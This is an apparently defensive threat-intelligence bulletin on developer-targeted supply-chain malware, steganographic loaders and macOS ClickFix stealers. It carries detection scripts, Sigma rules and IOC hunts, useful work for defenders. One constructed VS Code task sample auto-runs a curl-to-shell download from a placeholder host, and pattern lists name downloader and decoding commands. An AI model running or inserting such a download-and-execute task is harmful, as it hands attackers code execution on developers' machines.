Live OTX pulse data from 2026-05-21 indicates a coordinated surge in credential theft and malware distribution campaigns. The intelligence highlights the evolution of the North Korean-aligned Void Dokkaebi (WageMole) group, which has shifted to a self-propagating supply chain attack targeting software developers via malicious git repositories and fake job interviews. Simultaneously, the Fox Tempest actor is operationalizing a Malware-Signing-as-a-Service (MSaaS) ecosystem, facilitating the distribution of families like Lumma Stealer, Vidar, and Rhysida by abusing Microsoft Artifact Signing.
Parallel campaigns involve the PureLogs infostealer using PawsRunner to deliver payloads via steganography hidden in PNG images, and a macOS ClickFix campaign utilizing fake CAPTCHAs to deploy AppleScript stealers targeting browser data and crypto wallets. The collective objective across these pulses is the exfiltration of sensitive credentials, session cookies, and cryptocurrency wallet keys to facilitate financial theft and initial access for ransomware operations.
Threat Actor / Malware Profile
Void Dokkaebi (WageMole)
- Malware: DEV#POPPER RAT, InvisibleFerret, OmniStealer, BeaverTail.
- Distribution: Supply chain attack via poisoned code repositories. Uses "fake job interview" social engineering to lure developers into cloning malicious repos.
- Persistence: Modifies VS Code task configurations (.vscode/tasks.) to execute malicious payloads upon opening the project.
- Behavior: Worm propagation to infect other repositories; credential theft from development environments.
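The task-file persistence above is worth checking mechanically rather than by eye. The following Python example is added here and is not code from the page or the pulses: it parses the JSON task configuration VS Code reads from a project's .vscode directory and flags tasks that auto-run when the folder opens (VS Code's `runOptions.runOn: folderOpen`) or whose command line fetches and executes remote content. The sample configuration, the suspicious-pattern list and the severity labels are constructed for illustration.

```python
import json
import re

# Patterns that warrant a human look in a build task: remote fetch piped into a shell,
# encoded PowerShell, in-memory evaluation, base64 decoding. Constructed list; tune it.
SUSPICIOUS_PATTERNS = [
    r"\b(curl|wget|Invoke-WebRequest|iwr)\b",
    r"\|\s*(ba)?sh\b",
    r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",
    r"\b(iex|Invoke-Expression)\b",
    r"FromBase64String|base64\s+(-d|--decode)",
]


def _command_text(task: dict) -> str:
    """Join command and args, including the per-OS overrides VS Code supports."""
    parts = []
    for scope in (task, task.get("windows") or {}, task.get("linux") or {}, task.get("osx") or {}):
        parts.append(str(scope.get("command", "")))
        parts.extend(str(a) for a in scope.get("args", []))
    return " ".join(p for p in parts if p)


def triage_tasks(tasks_json: str) -> list:
    """Return one finding per task that auto-runs on folder open or matches a suspicious pattern."""
    doc = json.loads(tasks_json)
    findings = []
    for task in doc.get("tasks", []):
        cmd = _command_text(task)
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        hidden = (task.get("presentation") or {}).get("reveal") == "silent"
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
        if not (auto_run or hits):
            continue
        if auto_run and hits:
            severity = "high"      # runs without user action and looks like a downloader
        elif auto_run:
            severity = "medium"    # auto-run alone: legitimate projects use this too
        else:
            severity = "low"       # suspicious command, but only runs when triggered
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmd,
                         "auto_run": auto_run, "hidden": hidden,
                         "patterns": hits, "severity": severity})
    return findings


# Constructed sample task configuration: one benign build task and one auto-run downloader.
SAMPLE_TASKS_JSON = """
{
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "prepare env",
      "type": "shell",
      "command": "curl -fsSL http://payload.example.invalid/setup | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "silent" }
    }
  ]
}
"""

if __name__ == "__main__":
    for f in triage_tasks(SAMPLE_TASKS_JSON):
        print(f"[{f['severity'].upper()}] task '{f['label']}' auto_run={f['auto_run']}: {f['command']}")
```

Point it at every task file the PowerShell hunt below lists; a task that both auto-runs and pulls remote content is the pattern described for this campaign and should be treated as a confirmed finding, not a review item.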
Fox Tempest
- Role: Initial Access Broker / Enabler (MSaaS).
- Malware Signed: Rhysida, Oyster, Lumma Stealer, Vidar, Qilin, Akira, BlackByte.
- Technique: Abuses Microsoft Artifact Signing to generate fraudulent code-signing certificates, allowing malware to bypass security controls and appear trusted.
- Targeting: Healthcare, Education, Government, and Finance sectors.
PureLogs / PawsRunner
- Malware: PureLogs (.NET Infostealer).
- Distribution: Phishing emails with TXZ archive attachments (invoice-themed).
- Technique: Steganography. PawsRunner loader extracts encrypted payloads from benign-looking PNG images.
- Execution: Uses JavaScript with environment variable obfuscation to launch PowerShell decoders.
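Steganographic loaders of the kind described for PawsRunner give defenders a structural handle: the carrier image has to stay a valid PNG for the bait to work, so a payload is often appended after the IEND chunk or stored in a non-standard chunk. The following Python example is added here (it is not code from the page or from the campaign) and walks a PNG's chunk list, verifying CRCs and reporting trailing bytes after IEND, their entropy and any non-standard chunk types. It goes beyond the specific campaign by checking any PNG generically; the sample images and the private chunk name `paYl` are constructed.

```python
import math
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG spec and common extensions (APNG, eXIf).
STANDARD_CHUNKS = {"IHDR", "PLTE", "IDAT", "IEND", "tRNS", "cHRM", "gAMA", "iCCP", "sBIT",
                   "sRGB", "tEXt", "zTXt", "iTXt", "bKGD", "hIST", "pHYs", "sPLT", "tIME",
                   "eXIf", "acTL", "fcTL", "fdAT"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; close to 8.0 means random-looking, i.e. compressed or encrypted content."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def inspect_png(data: bytes) -> dict:
    """Walk the chunk list; report trailing bytes after IEND, bad CRCs and non-standard chunks."""
    findings = []
    if not data.startswith(PNG_SIG):
        return {"valid": False, "chunks": [], "trailing_bytes": 0,
                "trailing_entropy": 0.0, "findings": ["missing PNG signature"]}
    pos, chunks, trailing = len(PNG_SIG), [], b""
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        name = ctype.decode("latin-1")
        end = pos + 12 + length                     # length + type + data + crc
        if end > len(data):
            findings.append(f"truncated chunk {name}")
            break
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:end])[0]
        if crc != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            findings.append(f"CRC mismatch in {name}")
        if name not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {name} ({length} bytes)")
        chunks.append((name, length))
        pos = end
        if name == "IEND":
            trailing = data[pos:]                   # anything after IEND is not image data
            break
    if not chunks or chunks[-1][0] != "IEND":
        findings.append("no IEND chunk")
    ent = shannon_entropy(trailing)
    if trailing:
        findings.append(f"{len(trailing)} bytes after IEND (entropy {ent:.2f} bits/byte)")
    return {"valid": True, "chunks": chunks, "trailing_bytes": len(trailing),
            "trailing_entropy": ent, "findings": findings}


def _chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + \
        struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


def make_png(extra_chunks=(), trailer: bytes = b"") -> bytes:
    """Constructed 1x1 greyscale PNG for testing; not a real sample from the campaign."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit depth, greyscale
    idat = zlib.compress(b"\x00\x00")                      # filter byte + one pixel
    out = PNG_SIG + _chunk(b"IHDR", ihdr)
    for name, body in extra_chunks:
        out += _chunk(name, body)
    return out + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailer


CLEAN_PNG = make_png()
# Simulated loader-style carrier: a private chunk plus a high-entropy blob appended after IEND.
FAKE_PAYLOAD = bytes(range(256)) * 4
SUSPECT_PNG = make_png(extra_chunks=[(b"paYl", b"\x00" * 64)], trailer=FAKE_PAYLOAD)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PNG), ("suspect", SUSPECT_PNG)):
        print(label, inspect_png(img)["findings"])
```

Run it over images dropped by email attachments or fetched by script interpreters; a PNG with high-entropy trailing data or an unknown chunk is a strong triage signal. The caveat: a payload embedded in the pixel data itself (LSB stego) produces a structurally clean PNG and is not caught by this check, which is why the process-level Sigma rule below is still needed.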
macOS ClickFix
- Malware: AppleScript-based Infostealer.
- Distribution: Fake CAPTCHA pages (ClickFix) targeting both Windows and macOS.
- Target: Keychain databases, 12+ browsers, 200+ extensions, 16 crypto wallets.
IOC Analysis
The provided pulses contain a mix of File Hashes (MD5, SHA1, SHA256), Domains, URLs, IPv4 addresses, and Hostnames.
- File Hashes: A high volume of SHA256 hashes are present for payloads like DEV#POPPER, PureLogs, and signed binaries. SOC teams should ingest these into EDR solutions for immediate quarantining and historical scanning.
- Network IOCs: Domains such as bull-run.fun, spot-wave.fun, signspace.cloud, and everycarebd.com serve as C2 or payload distribution infrastructure. FrostyNeighbor activity includes suspicious hostnames like mickeymousegamesdealer.alexavegas.icu.
- Operationalization: IOCs should be blocked at the firewall/proxy level. SIEM correlations should trigger alerts for any process attempting to connect to these domains. The file hashes should be used in YARA rules to scan for steganographic images or malicious VS Code tasks.
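Matching the domain IOCs correctly matters more than it looks: the flagged hostname sits under alexavegas.icu, so an exact-match list misses it, while a naive substring match fires on unrelated names that merely contain an IOC. The following Python example is added here (not code from the page or the pulses) and matches on label boundaries, so a hostname hits only if it equals an IOC or is a subdomain of one. The proxy log lines and their key=value format are constructed; the domains are the ones listed above.

```python
import re
from typing import Optional

# Network IOCs from the pulses summarised above (domains, plus the parent domains of the flagged hostnames).
DOMAIN_IOCS = {"bull-run.fun", "spot-wave.fun", "signspace.cloud", "everycarebd.com",
               "alexavegas.icu", "needbinding.icu"}


def domain_matches(hostname: str, iocs=DOMAIN_IOCS) -> Optional[str]:
    """Return the IOC that `hostname` equals or is a subdomain of, else None.

    Walking label by label avoids the substring trap where 'notbull-run.fun' would fire
    on 'bull-run.fun'. Trailing dots and case are normalised first.
    """
    labels = hostname.strip().rstrip(".").lower().split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


# Constructed proxy log lines (not from the pulses) in a simple key=value format.
SAMPLE_LOG = """\
2026-05-21T09:14:02Z host=WS-0412 user=jdoe dst=bull-run.fun dport=443 action=allow
2026-05-21T09:14:09Z host=WS-0412 user=jdoe dst=mickeymousegamesdealer.alexavegas.icu dport=443 action=allow
2026-05-21T09:15:30Z host=WS-0077 user=asmith dst=notbull-run.fun dport=80 action=allow
2026-05-21T09:16:11Z host=WS-0077 user=asmith dst=cdn.example.com dport=443 action=allow
2026-05-21T09:17:45Z host=DEV-0009 user=build dst=signspace.cloud. dport=443 action=block
"""
LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
                     r"dst=(?P<dst>\S+) dport=(?P<dport>\d+) action=(?P<action>\w+)$")


def hunt(log_text: str, iocs=DOMAIN_IOCS) -> list:
    """Return one hit per log line whose destination matches an IOC; blocked attempts count too."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                                    # skip lines in an unexpected format
        ioc = domain_matches(m["dst"], iocs)
        if ioc:
            hits.append({"ts": m["ts"], "host": m["host"], "user": m["user"],
                         "dst": m["dst"], "ioc": ioc, "action": m["action"]})
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(f"{h['ts']} {h['host']} ({h['user']}) -> {h['dst']} matched {h['ioc']} [{h['action']}]")
```

A blocked connection is still a finding: the process that tried to reach the domain is on the host and needs triage. The KQL hunt below relies on the `has` operator for the same label-boundary behaviour.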
Detection Engineering
**Sigma Rules**

```yaml
title: Potential VS Code Task Persistence - Void Dokkaebi
id: 8a4b2c1d-5e6f-4a7b-8c9d-0e1f2a3b4c5d
description: Detects creation or modification of .vscode/tasks. files, which may indicate a supply chain attack using malicious VS Code tasks.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/void-dokkaebi
tags:
    - attack.persistence
    - attack.t1547.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains:
            - '.vscode\tasks.'    # Windows path separator as logged by Sysmon file events
            - '.vscode/tasks.'
    condition: selection
falsepositives:
    - Legitimate developer activity modifying build tasks
level: high
```
```yaml
title: PowerShell Steganography Decoder - PureLogs/PawsRunner
id: 9b5c3d2e-6f7a-5b8c-9d0e-1f2a3b4c5d6e
description: Detects PowerShell processes attempting to access image files combined with base64 decoding or stream operations, indicative of steganography loaders.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/purelogs
tags:
    - attack.defense_evasion
    - attack.t1027
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        CommandLine|contains:
            - '.png'
            - '.jpg'
            - '.bmp'
    selection_ps:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_decode:
        CommandLine|contains:
            - 'FromBase64String'
            - 'System.Drawing.Bitmap'
            - 'System.IO.Stream'
    condition: all of selection_*
falsepositives:
    - Legitimate image processing scripts
level: high
```
```yaml
title: Suspicious AppleScript Browser Access - macOS ClickFix
id: 0c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f
description: Detects AppleScript (osascript) accessing browser cookie or history directories, typical of ClickFix infostealers on macOS.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/clickfix-macos
tags:
    - attack.credential_access
    - attack.t1555.003
logsource:
    product: macos
    category: process_creation
detection:
    selection_osascript:
        Image|endswith: '/osascript'
    selection_browser_path:
        CommandLine|contains:
            - '/Library/Application Support/Google/Chrome'
            - '/Library/Application Support/Firefox'
            - '/Library/Safari'
    condition: all of selection_*
falsepositives:
    - User automation scripts managing browser data
level: high
```
**KQL (Microsoft Sentinel)**

```kql
// Hunt for network connections to the pulse domains.
// DeviceNetworkEvents carries the destination host/URL in RemoteUrl (there is no RemoteHostname column);
// has_any matches on term boundaries, so subdomains of the IOC domains are caught as well.
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl has_any ("bull-run.fun", "spot-wave.fun", "signspace.cloud", "everycarebd.com",
                           "alexavegas.icu", "needbinding.icu")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| extend TailoredIntel = "OTX Pulse Domain Hunt"
```
**PowerShell Hunt Script**

```powershell
# IOC hunter for Void Dokkaebi and PureLogs pulse hashes (MD5 and SHA256 values from the pulses)
$TargetHashes = @(
    "a12957e7627cb19fba2a4b155f7258b7", "e12285f507c847b986233991b86b22e3",
    "77b1beb083e4e2074402742ef2d677835072acf0e7ddd9ee8206e5a2c76b1ca5",
    "0fcb86ae384e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e"
)
# Split the list by digest length so each file is only hashed with algorithms we have IOCs for
$Md5Set    = $TargetHashes | Where-Object { $_.Length -eq 32 }
$Sha256Set = $TargetHashes | Where-Object { $_.Length -eq 64 }

Write-Host "Scanning for malicious file hashes..." -ForegroundColor Cyan
# -File skips directories, which Get-FileHash cannot hash
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_.FullName
        if ($Md5Set) {
            $md5 = (Get-FileHash -Path $file -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
            if ($md5 -and $Md5Set -contains $md5) {
                Write-Host "[!] MATCH FOUND (MD5): $file" -ForegroundColor Red
            }
        }
        if ($Sha256Set) {
            $sha256 = (Get-FileHash -Path $file -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($sha256 -and $Sha256Set -contains $sha256) {
                Write-Host "[!] MATCH FOUND (SHA256): $file" -ForegroundColor Red
            }
        }
    }

# Check for VS Code task files: the user-level tasks file and any project .vscode folders under the profile
$TaskRoots = @("$env:APPDATA\Code\User", $env:USERPROFILE)
foreach ($root in $TaskRoots) {
    if (Test-Path $root) {
        Write-Host "Checking VS Code task files under $root..." -ForegroundColor Cyan
        Get-ChildItem -Path $root -Recurse -File -Filter "tasks.*" -ErrorAction SilentlyContinue |
            Where-Object { $_.DirectoryName -like "*\.vscode" -or $_.DirectoryName -eq "$env:APPDATA\Code\User" } |
            ForEach-Object {
                Write-Host "[+] VS Code tasks file found: $($_.FullName)" -ForegroundColor Yellow
                # Manual review recommended: look for tasks that run automatically on folder open
            }
    }
}
```
Response Priorities
- Immediate:
  - Block all listed domains and IPs at the network perimeter.
  - Run the PowerShell hunt script across endpoints to identify dropped payloads.
  - Quarantine any systems matching the Sigma rule alerts for VS Code task modification or PowerShell steganography.
- 24 Hours:
  - If infection is confirmed (especially with OmniStealer, PureLogs, or ClickFix), assume credential compromise. Force password resets for impacted accounts and revoke session tokens.
  - Investigate developer workstations for signs of repository cloning (Void Dokkaebi) and check git history for tampering.
- 1 Week:
  - Review and harden software supply chain policies. Mandate code review for all CI/CD tasks.
  - Implement application control to block unsigned PowerShell scripts and unauthorized AppleScript execution on macOS endpoints.
  - Audit code-signing certificate issuance logs to detect potential abuse by Fox Tempest.